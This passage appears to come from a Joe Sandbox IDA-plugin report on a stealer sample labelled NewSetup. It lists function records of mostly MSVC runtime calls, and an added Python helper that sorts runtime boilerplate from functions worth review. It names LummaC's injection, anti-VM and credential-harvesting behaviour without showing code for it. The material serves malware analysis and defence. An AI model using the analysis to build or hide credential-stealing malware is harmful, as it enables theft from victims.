• Opcode ID: c98c4e7c1ff695148a3b2b66474d61b3e2525dd3f1ef15213b21af93635afc9a
• Instruction ID: a2441f7eac25f9c8aac96be948cad35375c2aefc916c44f6c766b37f380f2123
• Opcode Fuzzy Hash: c98c4e7c1ff695148a3b2b66474d61b3e2525dd3f1ef15213b21af93635afc9a
• Instruction Fuzzy Hash: 9D4177B5E112158BCB10DF98E844BEABBF2BFA4720F148119D8156B391DB35AA90CF91
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00220086
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00220094
• GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 002200A5
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
• API String ID: 667068680-1047828073
• Opcode ID: 5a800ae7c490712f883fed0b49dceacdd7b77fda7a6273b05685b17cecaae006
• Instruction ID: 8fceee0cfdaf3c1705b08051bc96e4c1af7491eeadb142179e3f2bac567e779e
• Opcode Fuzzy Hash: 5a800ae7c490712f883fed0b49dceacdd7b77fda7a6273b05685b17cecaae006
• Instruction Fuzzy Hash: 0AD0C979562620AB8354AFF8FC4D98A3EB9FA0B7123024553F841D2360DFB486108B9A
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d1182ac39afb8ff0e343e8d2f5a5bdb0ebe4038d65f59ec5b8ff983426c4fc6b
                                                                                                      • Instruction ID: 13da66b86169384ea0065df5e7e8fdfdd5df5775139059c1dc43f2106f920927
                                                                                                      • Opcode Fuzzy Hash: d1182ac39afb8ff0e343e8d2f5a5bdb0ebe4038d65f59ec5b8ff983426c4fc6b
                                                                                                      • Instruction Fuzzy Hash: 60B13AF4E28666AFDB01CFA8D885BBE7BB4BF06300F144199E90957291C7719D61CF90
APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 00219C97
• std::_Throw_Cpp_error.LIBCPMT ref: 00219CA8
• std::_Throw_Cpp_error.LIBCPMT ref: 00219CBC
• std::_Throw_Cpp_error.LIBCPMT ref: 00219CDD
• std::_Throw_Cpp_error.LIBCPMT ref: 00219CEE
• std::_Throw_Cpp_error.LIBCPMT ref: 00219D06
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_
• String ID:
• API String ID: 2134207285-0
• Opcode ID: b5afe0aabec58d16ab43fc4a28ddf67d95b06c1d020bcbd0b9bfd5f1ac2090ea
• Instruction ID: ec26ff9712bb04ebf6b99e97dee21df0dc24517e60e02aec0373de0a92863111
• Opcode Fuzzy Hash: b5afe0aabec58d16ab43fc4a28ddf67d95b06c1d020bcbd0b9bfd5f1ac2090ea
• Instruction Fuzzy Hash: 8A41C2B1910745CBDB309F6089117EFB7F4AF69324F18062ED9BA162D1D37165E0CB92
APIs
• GetLastError.KERNEL32(?,?,0022ACDE,00220760,0021B77F,456001D6,?,?,?,?,0023BFCA,000000FF), ref: 0022ACF5
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0022AD03
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0022AD1C
• SetLastError.KERNEL32(00000000,?,0022ACDE,00220760,0021B77F,456001D6,?,?,?,?,0023BFCA,000000FF), ref: 0022AD6E
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 1b1cc376b8722a7410f92badde6d1e5632cf0fe800e3ad608a8fe9c3029ff68a
• Instruction ID: cd2bbadc122df4013fdcc1c87199118a29cb737b0b0d74f0ac455bc5bed3e3d7
• Opcode Fuzzy Hash: 1b1cc376b8722a7410f92badde6d1e5632cf0fe800e3ad608a8fe9c3029ff68a
• Instruction Fuzzy Hash: 51012D36235B37FFE7251AF87C4D8262698E702B71720032BF61041DF0EF518C229941
APIs
• type_info::operator==.LIBVCRUNTIME ref: 0022B68D
• CallUnexpected.LIBVCRUNTIME ref: 0022B906
Strings
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: CallUnexpectedtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2673424686-393685449
• Opcode ID: dc24f95255ecae4609a00b26126cb44d26834d831c2df0a6d9ecac4089f8ee52
• Instruction ID: 576066667541c776c60a9b8b351f643cc00d3caf5bf4745cd5c48d30d242a9fa
• Opcode Fuzzy Hash: dc24f95255ecae4609a00b26126cb44d26834d831c2df0a6d9ecac4089f8ee52
• Instruction Fuzzy Hash: 20B17B7182022AFBCF16DFE4E8819AEB7B9AF04310B14455AE8156B202D731D971DF92
APIs
• std::_Ref_count_base::_Decref.LIBCPMT ref: 0021BF44
• std::_Ref_count_base::_Decref.LIBCPMT ref: 0021C028
Strings
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: DecrefRef_count_base::_std::_
• String ID: MOC$RCC$csm
• API String ID: 1456557076-2671469338
• Opcode ID: 95b4e268f539b89adcac33be7d9e1e9b10e2d6cca9317031fe319dfb8cca43b0
• Instruction ID: ac025a7262330f99c5cd20c22ea96b7598506f8dc96bfe04ccea1c7869760ff2
• Opcode Fuzzy Hash: 95b4e268f539b89adcac33be7d9e1e9b10e2d6cca9317031fe319dfb8cca43b0
• Instruction Fuzzy Hash: EF41CD74910206DFCF2ADF68C9459EDB7F4BF68300F58805DE449A7A42C734AAA5CF52
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,456001D6,?,?,00000000,0023BE94,000000FF,?,00225685,00000002,?,00225721,00228396), ref: 002255F9
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0022560B
• FreeLibrary.KERNEL32(00000000,?,?,00000000,0023BE94,000000FF,?,00225685,00000002,?,00225721,00228396), ref: 0022562D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 96bf689e63735530a3363d4f4e482ffd35cde08b24cf453aa7c90595ab844530
• Instruction ID: e48df7afeff1a3fe89048fa10e277669cfe8f50512d3b61ece97b5514aedd8d7
• Opcode Fuzzy Hash: 96bf689e63735530a3363d4f4e482ffd35cde08b24cf453aa7c90595ab844530
• Instruction Fuzzy Hash: 2701D675A10629BFCB118F94EC0DBBEB7BCFB06B15F004526F811E2690DBB49910CA90
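Most of the function records in this part of the listing are C/C++ runtime code that ships in any MSVC-built binary, not stealer logic: the GetLastError / ___vcrt_FlsGetValue / ___vcrt_FlsSetValue / SetLastError sequence above is the vcruntime per-thread-data accessor, and the GetModuleHandleExW("mscoree.dll") + GetProcAddress("CorExitProcess") + FreeLibrary record is the MSVC CRT exit path checking whether the .NET runtime is loaded. The following script is an added triage helper, not part of the Joe Sandbox report or its plugin: it parses records in the format shown on this page (the record layout and the regular expressions are inferred from the listing), separates runtime boilerplate from functions that call Win32 APIs directly, and checks the Opcode ID against the Opcode Fuzzy Hash field. The sample input is copied from this report's records and trimmed of the repeated "Associated:" dump lines; the classification rules are heuristics of this example.

```python
"""Triage helper for Joe Sandbox IDA-plugin function records (added example)."""
import re

# Constructed sample: four records copied from this report, "Associated:" lines omitted.
SAMPLE = """\
APIs
• GetLastError.KERNEL32(?,?,0022ACDE,00220760,0021B77F,456001D6,?,?,?,?,0023BFCA,000000FF), ref: 0022ACF5
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0022AD03
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0022AD1C
• SetLastError.KERNEL32(00000000,?,0022ACDE,00220760,0021B77F,456001D6,?,?,?,?,0023BFCA,000000FF), ref: 0022AD6E
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 1b1cc376b8722a7410f92badde6d1e5632cf0fe800e3ad608a8fe9c3029ff68a
• Opcode Fuzzy Hash: 1b1cc376b8722a7410f92badde6d1e5632cf0fe800e3ad608a8fe9c3029ff68a
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,456001D6,?,?,00000000,0023BE94,000000FF,?,00225685,00000002,?,00225721,00228396), ref: 002255F9
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0022560B
• FreeLibrary.KERNEL32(00000000,?,?,00000000,0023BE94,000000FF,?,00225685,00000002,?,00225721,00228396), ref: 0022562D
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 96bf689e63735530a3363d4f4e482ffd35cde08b24cf453aa7c90595ab844530
• Opcode Fuzzy Hash: 96bf689e63735530a3363d4f4e482ffd35cde08b24cf453aa7c90595ab844530
APIs
• GetCurrentThreadId.KERNEL32 ref: 0021F005
• AcquireSRWLockExclusive.KERNEL32(00218E38), ref: 0021F024
• TryAcquireSRWLockExclusive.KERNEL32(00218E38,0021A2F0,?), ref: 0021F0AD
Similarity
• API ID: AcquireExclusiveLock$CurrentThread
• String ID:
• API String ID: 66001078-0
• Opcode ID: be85b2aeffe1aebed0864cec17f74bfb285c0001cd5b7f587cdbe14fdc265e60
• Opcode Fuzzy Hash: be85b2aeffe1aebed0864cec17f74bfb285c0001cd5b7f587cdbe14fdc265e60
APIs
• __alloca_probe_16.LIBCMT ref: 0022D76F
  • Part of subcall function 0022BF11: RtlAllocateHeap.NTDLL(00000000,0022DF35,?,?,0022DF35,00000220,?,00000000,?), ref: 0022BF43
• __freea.LIBCMT ref: 0022D8B2
Similarity
• API ID: __freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 1423051803-0
• Opcode ID: 3e05db668bd2dae0f90af092a00a4cf87d44b2b910a9fb40708bbb9e0f30d1d3
• Opcode Fuzzy Hash: 3e05db668bd2dae0f90af092a00a4cf87d44b2b910a9fb40708bbb9e0f30d1d3
"""

# "• Name.LIB(args), ref: ADDR" or "• Name.LIB ref: ADDR", optionally nested as a subcall.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<lib>[A-Z0-9]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")  # "• Key: value"
RUNTIME_LIBS = {"LIBCMT", "LIBCPMT", "LIBVCRUNTIME"}  # MSVC runtime, never the sample's own logic


def parse_records(text):
    """Split the listing into records, one per 'APIs' header, keeping API lines and key/value fields."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "fields": {}}
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # plain section headers such as Strings / Similarity
        m = API_RE.match(line)  # API lines first: "std::..." would otherwise look like a field
        if m:
            cur["apis"].append(m.groupdict())
            continue
        m = FIELD_RE.match(line)
        if m:
            cur["fields"][m["key"]] = m["val"]
    return records


def classify(rec):
    """Heuristic label: known CRT patterns, then all-runtime-library functions, else review."""
    direct = [a for a in rec["apis"] if a["sub"] is None]
    names = {a["name"] for a in direct}
    libs = {a["lib"] for a in direct}
    strings = set(rec["fields"].get("String ID", "").split("$")) - {""}
    # MSVC CRT exit path: GetModuleHandleExW("mscoree.dll") then GetProcAddress("CorExitProcess").
    if {"GetModuleHandleExW", "GetProcAddress"} <= names and {"mscoree.dll", "CorExitProcess"} <= strings:
        return "crt-boilerplate: exit path probing mscoree.dll for CorExitProcess"
    if {"___vcrt_FlsGetValue", "___vcrt_FlsSetValue"} & names:  # vcruntime per-thread data via FLS
        return "crt-boilerplate: vcruntime per-thread data (FLS)"
    if libs and libs <= RUNTIME_LIBS:
        return "crt-boilerplate: only " + "/".join(sorted(libs)) + " calls"
    return "review: " + ", ".join(sorted(names))


def hash_consistent(rec):
    """In this listing Opcode ID and Opcode Fuzzy Hash carry the same value; flag any record where they differ."""
    f = rec["fields"]
    return f.get("Opcode ID") == f.get("Opcode Fuzzy Hash")


def triage(text):
    out = []
    for rec in parse_records(text):
        refs = [a["ref"] for a in rec["apis"] if a["sub"] is None]  # 8-digit hex, so min() is the lowest address
        out.append({
            "api_string_id": rec["fields"].get("API String ID", ""),
            "first_ref": min(refs) if refs else None,
            "label": classify(rec),
            "hash_consistent": hash_consistent(rec),
            "subcalls": sorted({a["name"] for a in rec["apis"] if a["sub"]}),
        })
    return out


if __name__ == "__main__":
    for r in triage(SAMPLE):
        print(f'{r["first_ref"]}  {r["api_string_id"]:<24} {r["label"]}')
```

Functions labelled crt-boilerplate can be skipped during manual review so that attention goes to records with KERNEL32, NTDLL or WMI calls, which is where LummaC's injection, anti-VM and credential-harvesting behaviour lives. Indirect calls seen only through "Part of subcall function" lines are reported separately so a heap allocation inside a CRT helper does not promote the caller to the review list.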
APIs
• __alloca_probe_16.LIBCMT ref: 0022D76F
• __alloca_probe_16.LIBCMT ref: 0022D838
• __freea.LIBCMT ref: 0022D89F
  • Part of subcall function 0022BF11: RtlAllocateHeap.NTDLL(00000000,0022DF35,?,?,0022DF35,00000220,?,00000000,?), ref: 0022BF43
• __freea.LIBCMT ref: 0022D8B2
• __freea.LIBCMT ref: 0022D8BF
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 1423051803-0
• Opcode ID: 3e05db668bd2dae0f90af092a00a4cf87d44b2b910a9fb40708bbb9e0f30d1d3
• Instruction ID: f66d38fba59de9371627ce61650e4bd1dd66a616d4e01958824e5975b649c123
• Opcode Fuzzy Hash: 3e05db668bd2dae0f90af092a00a4cf87d44b2b910a9fb40708bbb9e0f30d1d3
• Instruction Fuzzy Hash: 1F519472620227BFEF219FE0AC81EBB77A9EF44710B150129FD04D6251E774DC729AA1
APIs
• GetCurrentThreadId.KERNEL32 ref: 0021F005
• AcquireSRWLockExclusive.KERNEL32(00218E38), ref: 0021F024
• AcquireSRWLockExclusive.KERNEL32(00218E38,0021A2F0,?), ref: 0021F052
• TryAcquireSRWLockExclusive.KERNEL32(00218E38,0021A2F0,?), ref: 0021F0AD
• TryAcquireSRWLockExclusive.KERNEL32(00218E38,0021A2F0,?), ref: 0021F0C4
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: AcquireExclusiveLock$CurrentThread
• String ID:
• API String ID: 66001078-0
• Opcode ID: be85b2aeffe1aebed0864cec17f74bfb285c0001cd5b7f587cdbe14fdc265e60
• Instruction ID: ded5c8c19adc6dbb69184a5adb984cabf458e399fc10ada4332e8464ba347df2
• Opcode Fuzzy Hash: be85b2aeffe1aebed0864cec17f74bfb285c0001cd5b7f587cdbe14fdc265e60
• Instruction Fuzzy Hash: 09418C7592060ADFCB60CF24C6849EAB3F4FF29310B20493AE46A97546D770E9E5CF51
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 0021D4C9
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0021D4D3
                                                                                                      • int.LIBCPMT ref: 0021D4EA
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0021C1F6
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0021C210
                                                                                                      • codecvt.LIBCPMT ref: 0021D50D
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0021D544
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                      • String ID:
                                                                                                      • API String ID: 3716348337-0
                                                                                                      • Opcode ID: 68a5fdfba31e12b7d34923b2641b581d04654afd0126ed54dddcd89ef5269bfc
                                                                                                      • Instruction ID: 2064acb6a62eb2eedff8fd5820831976e0aa0add34a34a94062527851a714108
                                                                                                      • Opcode Fuzzy Hash: 68a5fdfba31e12b7d34923b2641b581d04654afd0126ed54dddcd89ef5269bfc
                                                                                                      • Instruction Fuzzy Hash: 4E01C435921115DBCB06EB68D905AEE77F2AFA4324F740109E425AB292DF749EA0CF81
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 0021ADDE
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0021ADE9
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0021AE57
                                                                                                        • Part of subcall function 0021ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0021ACC2
                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 0021AE04
                                                                                                      • _Yarn.LIBCPMT ref: 0021AE1A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                      • String ID:
                                                                                                      • API String ID: 1088826258-0
                                                                                                      • Opcode ID: dd8d5694f9b6d5decb0966c86b77927ba20338cc8f9ce7dd8885e54b96d3d470
                                                                                                      • Instruction ID: 5cd80c1a5c79fffd8f8034b7bb5249b234814f3e517d14be1b7414e4686a1489
                                                                                                      • Opcode Fuzzy Hash: dd8d5694f9b6d5decb0966c86b77927ba20338cc8f9ce7dd8885e54b96d3d470
                                                                                                      • Instruction Fuzzy Hash: CC01D8796221119BCB05EF24E9595BD77F5FF95750B14001AE40257382CF346E91CFC2
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00225BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00230A35
                                                                                                      • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00225BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00230A6C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CodePageValid
                                                                                                      • String ID: ,K$$utf8
                                                                                                      • API String ID: 943130320-825729930
                                                                                                      • Opcode ID: e3bceb87d1babc400da63888cb0a3956ff476a8566122b774c28ef1eb402633f
                                                                                                      • Instruction ID: 8a82edb2ae76104c622ebc57056dfcf025515d16b99ec51f207f74413bc61f7f
                                                                                                      • Opcode Fuzzy Hash: e3bceb87d1babc400da63888cb0a3956ff476a8566122b774c28ef1eb402633f
                                                                                                      • Instruction Fuzzy Hash: DD510BB1630306AAD724AF709CE1F7BB3A9EF05708F140425F64597181E6B0EDB08B75
                                                                                                      APIs
                                                                                                      • Concurrency::details::_Release_chore.LIBCPMT ref: 00217526
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00217561
                                                                                                        • Part of subcall function 0021AF37: CreateThreadpoolWork.KERNEL32(0021B060,00218A2A,00000000), ref: 0021AF46
                                                                                                        • Part of subcall function 0021AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 0021AF53
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                      • String ID: Fail to schedule the chore!$G.$
                                                                                                      • API String ID: 3683891980-3836090748
                                                                                                      • Opcode ID: 22d83ffd62bbe1ca32624d7355a896f4529d6008a9a13cdc84af89d3f5fa50e8
                                                                                                      • Instruction ID: 6e949584efe9c77130e3f4f3eac1f2fdc9c5fc37e94a8f9db5faf7a8870256a2
